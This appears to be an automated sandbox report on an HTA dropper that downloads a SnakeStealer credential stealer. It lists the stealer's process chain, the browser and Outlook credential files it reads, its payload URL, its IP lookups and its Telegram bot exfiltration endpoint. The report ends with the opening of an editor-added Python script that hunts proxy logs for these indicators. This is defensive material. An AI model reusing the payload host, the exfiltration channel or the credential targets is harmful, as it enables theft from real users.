                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll | VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll | VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll | VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_00D34E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter | 6_2_00D34E87
                    Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_00D41E06 GetUserNameW | 6_2_00D41E06
                    Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_00D33F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte | 6_2_00D33F3A
                    Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_00D049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo | 6_2_00D049A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 6.2.csoss.exe.eb0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 6.2.csoss.exe.eb0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.2.RegSvcs.exe.520000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: csoss.exe PID: 6740, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5484, type: MEMORYSTR
                    Source: Yara match | File source: 6.2.csoss.exe.eb0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 6.2.csoss.exe.eb0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.2.RegSvcs.exe.520000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: csoss.exe PID: 6740, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5484, type: MEMORYSTR
                    Source: Yara match | File source: 6.2.csoss.exe.eb0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 6.2.csoss.exe.eb0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.2.RegSvcs.exe.520000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: csoss.exe PID: 6740, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5484, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: csoss.exe | Binary or memory string: WIN_81
                    Source: csoss.exe | Binary or memory string: WIN_XP
                    Source: csoss.exe | Binary or memory string: WIN_XPe
                    Source: csoss.exe | Binary or memory string: WIN_VISTA
                    Source: csoss.exe | Binary or memory string: WIN_7
                    Source: csoss.exe | Binary or memory string: WIN_8
                    Source: csoss[1].exe.3.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                    Source: Yara match | File source: 6.2.csoss.exe.eb0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 6.2.csoss.exe.eb0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.2.RegSvcs.exe.520000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000007.00000002.2509390080.0000000002646000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: csoss.exe PID: 6740, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5484, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match | File source: 6.2.csoss.exe.eb0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 6.2.csoss.exe.eb0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.2.RegSvcs.exe.520000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: csoss.exe PID: 6740, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5484, type: MEMORYSTR
                    Source: Yara match | File source: 6.2.csoss.exe.eb0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 6.2.csoss.exe.eb0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.2.RegSvcs.exe.520000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: csoss.exe PID: 6740, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5484, type: MEMORYSTR
                    Source: Yara match | File source: 6.2.csoss.exe.eb0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 6.2.csoss.exe.eb0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.2.RegSvcs.exe.520000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: csoss.exe PID: 6740, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5484, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_00D76283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket | 6_2_00D76283
                    Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_00D76747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket | 6_2_00D76747
                    MITRE ATT&CK matrix (one column per tactic; the number in parentheses is the per-technique count shown in the original matrix):

                    | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                    |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                    | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts (2) | Native API (12) | DLL Side-Loading (1) | Exploitation for Privilege Escalation (1) | Disable or Modify Tools (11) | OS Credential Dumping (1) | System Time Discovery (2) | Remote Services | Archive Collected Data (11) | Ingress Tool Transfer (12) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1) |
                    | Credentials | Domains | Default Accounts | Command and Scripting Interpreter (11) | Valid Accounts (2) | DLL Side-Loading (1) | Deobfuscate/Decode Files or Information (11) | Input Capture (121) | Account Discovery (1) | Remote Desktop Protocol | Data from Local System (1) | Encrypted Channel (11) | Exfiltration Over Bluetooth | Network Denial of Service |
                    | Email Addresses | DNS Server | Domain Accounts | PowerShell (3) | Logon Script (Windows) | Valid Accounts (2) | Obfuscated Files or Information (3) | Security Account Manager | File and Directory Discovery (2) | SMB/Windows Admin Shares | Email Collection (11) | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact |
                    | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Access Token Manipulation (21) | DLL Side-Loading (1) | NTDS | System Information Discovery (128) | Distributed Component Object Model | Input Capture (121) | Application Layer Protocol (23) | Traffic Duplication | Data Destruction |
                    | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Process Injection (212) | Masquerading (1) | LSA Secrets | Security Software Discovery (331) | SSH | Clipboard Data (3) | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                    | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Valid Accounts (2) | Cached Domain Credentials | Virtualization/Sandbox Evasion (21) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                    | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Virtualization/Sandbox Evasion (21) | DCSync | Process Discovery (3) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                    | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation (21) | Proc Filesystem | Application Window Discovery (11) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                    | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Process Injection (212) | /etc/passwd and /etc/shadow | System Owner/User Discovery (1) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
                    | IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | System Network Configuration Discovery (1) | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
                    Behavior Graph ID: 1640151 | Sample: needagoodplanforsuccesstoge... | Start date: 17/03/2025 | Architecture: WINDOWS | Score: 100

                    Root (sample):
                      DNS/IP: reallyfreegeoip.org; checkip.dyndns.org; checkip.dyndns.com
                      Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 13 other signatures
                      Signature on reallyfreegeoip.org: Tries to detect the country of the analysis system (by using the IP)
                      mshta.exe (started)
                        Signatures: Suspicious command line found; PowerShell case anomaly found
                        cmd.exe (started)
                          Signatures: Detected Cobalt Strike Beacon; Suspicious powershell command line found; PowerShell case anomaly found
                          powershell.exe (started)
                            DNS/IP: 23.95.235.28, 49695, 80 AS-COLOCROSSINGUS United States
                            Dropped: C:\Users\user\AppData\Roaming\csoss.exe (PE32); C:\Users\user\AppData\Local\...\csoss[1].exe (PE32); C:\Users\user\AppData\...\43swuu3x.cmdline (Unicode)
                            Signatures: Loading BitLocker PowerShell Module; Powershell drops PE file
                            csoss.exe (started)
                              Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file; 4 other signatures
                              RegSvcs.exe (started)
                                DNS/IP: checkip.dyndns.com 158.101.44.242, 49696, 80 ORACLE-BMC-31898US United States; reallyfreegeoip.org 104.21.48.1, 443, 49697 CLOUDFLARENETUS United States
                                Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
                            csc.exe (started)
                              Dropped: C:\Users\user\AppData\Local\...\43swuu3x.dll (PE32)
                              cvtres.exe (started)
                          conhost.exe (started)

                    | Source | Detection | Scanner | Label |
                    |---|---|---|---|
                    | needagoodplanforsuccesstogetbackbest.hta | 41% | Virustotal | |
                    | needagoodplanforsuccesstogetbackbest.hta | 28% | ReversingLabs | Script-WScript.Trojan.Asthma |

                    | Source | Detection | Scanner | Label |
                    |---|---|---|---|
                    | C:\Users\user\AppData\Roaming\csoss.exe | 100% | Avira | TR/AD.SnakeStealer.ergur |
                    | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csoss[1].exe | 100% | Avira | TR/AD.SnakeStealer.ergur |
                    | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csoss[1].exe | 83% | ReversingLabs | Win32.Trojan.AutoitInject |
                    | C:\Users\user\AppData\Roaming\csoss.exe | 83% | ReversingLabs | Win32.Trojan.AutoitInject |

                    No Antivirus matches
                    No Antivirus matches

                    | Source | Detection | Scanner | Label |
                    |---|---|---|---|
                    | http://23.95.235.28/120/csoss.ex | 0% | Avira URL Cloud | safe |
                    | http://23.95.235.28/120/csoss.exeSs | 0% | Avira URL Cloud | safe |
                    | http://23.95.235.28/120/csoss.exe | 0% | Avira URL Cloud | safe |
                    | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
                    |---|---|---|---|---|---|
                    | reallyfreegeoip.org | 104.21.48.1 | true | false | | high |
                    | checkip.dyndns.com | 158.101.44.242 | true | false | | high |
                    | checkip.dyndns.org | unknown | unknown | false | | high |
                    | Name | Malicious | Antivirus Detection | Reputation |
                    |---|---|---|---|
                    | https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high |
                    | http://23.95.235.28/120/csoss.exe | true | Avira URL Cloud: safe | unknown |
                    | http://checkip.dyndns.org/ | false | | high |
                    | Name | Source | Malicious | Antivirus Detection | Reputation |
                    |---|---|---|---|---|
                    | http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.1402259894.00000000056C9000.00000004.00000800.00020000.00000000.sdmp | false | | high |
                    | https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000003.00000002.1400376615.00000000047B7000.00000004.00000800.00020000.00000000.sdmp | false | | high |
                    | http://pesterbdd.com/images/Pester.png | powershell.exe, 00000003.00000002.1400376615.00000000047B7000.00000004.00000800.00020000.00000000.sdmp | false | | high |
                    | http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000003.00000002.1400376615.00000000047B7000.00000004.00000800.00020000.00000000.sdmp | false | | high |
                    | http://23.95.235.28/120/csoss.ex | powershell.exe, 00000003.00000002.1400376615.0000000004B4A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
                    | http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000003.00000002.1400376615.00000000047B7000.00000004.00000800.00020000.00000000.sdmp | false | | high |
                    | http://reallyfreegeoip.orgd | RegSvcs.exe, 00000007.00000002.2509390080.000000000258D000.00000004.00000800.00020000.00000000.sdmp | false | | high |
                    | https://contoso.com/License | powershell.exe, 00000003.00000002.1402259894.00000000056C9000.00000004.00000800.00020000.00000000.sdmp | false | | high |
                    | https://contoso.com/Icon | powershell.exe, 00000003.00000002.1402259894.00000000056C9000.00000004.00000800.00020000.00000000.sdmp | false | | high |
                    | http://checkip.dyndns.org | RegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2509390080.000000000255E000.00000004.00000800.00020000.00000000.sdmp | false | | high |
                    | https://github.com/Pester/Pester | powershell.exe, 00000003.00000002.1400376615.00000000047B7000.00000004.00000800.00020000.00000000.sdmp | false | | high |
                    | http://23.95.235.28/120/csoss.exeSs | powershell.exe, 00000003.00000002.1413448646.0000000007C72000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown |
                    | https://reallyfreegeoip.org/xml/8.46.123.189l | RegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmp | false | | high |
                    | http://checkip.dyndns.comd | RegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmp | false | | high |
                    | https://aka.ms/pscore6lB | powershell.exe, 00000003.00000002.1400376615.0000000004661000.00000004.00000800.00020000.00000000.sdmp | false | | high |
                    | http://checkip.dyndns.org/q | csoss.exe, 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp | false | | high |
                    | http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000003.00000002.1400376615.00000000047B7000.00000004.00000800.00020000.00000000.sdmp | false | | high |
                    | https://contoso.com/ | powershell.exe, 00000003.00000002.1402259894.00000000056C9000.00000004.00000800.00020000.00000000.sdmp | false | | high |
                    | https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.1402259894.00000000056C9000.00000004.00000800.00020000.00000000.sdmp | false | | high |
                    | https://reallyfreegeoip.org/xml/8.46.123.189d | RegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmp | false | | high |
                    | http://reallyfreegeoip.org | RegSvcs.exe, 00000007.00000002.2509390080.000000000258D000.00000004.00000800.00020000.00000000.sdmp | false | | high |
                    | http://checkip.dyndns.orgd | RegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmp | false | | high |
                    | https://reallyfreegeoip.org | RegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmp | false | | high |
                    | http://checkip.dyndns.com | RegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmp | false | | high |
                    | http://checkip.dyndns.org/d | RegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmp | false | | high |
                    | http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000003.00000002.1400376615.0000000004661000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2509390080.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | false | | |
                                                                              high
                                                                              https://api.telegram.org/bot-/sendDocument?chat_id=csoss.exe, 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                high
                                                                                https://reallyfreegeoip.org/xml/csoss.exe, 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2509390080.0000000002570000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
IP | Domain | Country | ASN | ASN Name | Malicious
--- | --- | --- | --- | --- | ---
104.21.48.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENET, US | false
23.95.235.28 | unknown | United States | 36352 | AS-COLOCROSSING, US | true
158.101.44.242 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898, US | false
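The URL and IP tables above describe the sample's network behaviour: it looks up its public IP on checkip.dyndns.org/.com, geolocates that IP via reallyfreegeoip.org/xml/<ip>, and uploads stolen data through the Telegram Bot API (api.telegram.org/bot<token>/sendDocument), after the initial download from 23.95.235.28. Each of these hosts is noisy on its own; all three from one client inside a short window is a usable hunt. The script below turns that into a check over proxy logs. It is an added example by the editor, not part of the Joe Sandbox report; the log line format (ISO timestamp, client IP, method, URL), the client addresses, the redacted bot token and the ten-minute window are assumptions, and the log lines are constructed.

```python
"""Hunt web-proxy logs for the MassLogger network pattern seen in this report.

Stages: recon (checkip.dyndns.org/.com) -> geoip (reallyfreegeoip.org/xml/<ip>)
-> exfil (api.telegram.org/bot<token>/sendDocument). Contact with the payload
host the report marks malicious (23.95.235.28) is a direct indicator.
Editor's example, not part of the Joe Sandbox report. Log format is assumed:
'<ISO timestamp> <client ip> <method> <url>' per line.
"""
from __future__ import annotations

import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

RECON_HOSTS = {"checkip.dyndns.org", "checkip.dyndns.com"}
GEOIP_HOSTS = {"reallyfreegeoip.org"}
PAYLOAD_HOSTS = {"23.95.235.28"}          # from the report's URL/IP tables
TELEGRAM_PATH = re.compile(r"^/bot[^/]+/send(Document|Message)$", re.IGNORECASE)
WINDOW = timedelta(minutes=10)            # assumed; tune to your environment
REQUIRED = {"recon", "geoip", "exfil"}

# Constructed sample log. 203.0.113.7 is a documentation address; tokens redacted.
SAMPLE_PROXY_LOG = """\
2025-03-17T00:18:01 10.0.0.12 GET http://checkip.dyndns.org/
2025-03-17T00:18:03 10.0.0.12 GET https://reallyfreegeoip.org/xml/203.0.113.7
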